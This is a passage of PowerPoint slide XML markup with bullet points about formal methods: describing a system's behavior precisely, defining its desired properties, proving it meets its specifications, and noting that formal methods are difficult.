            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>characterize a system's behavior more precisely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>precisely define the system's desired properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>prove a system meets its specifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>FM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>is really, really difficult</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esson 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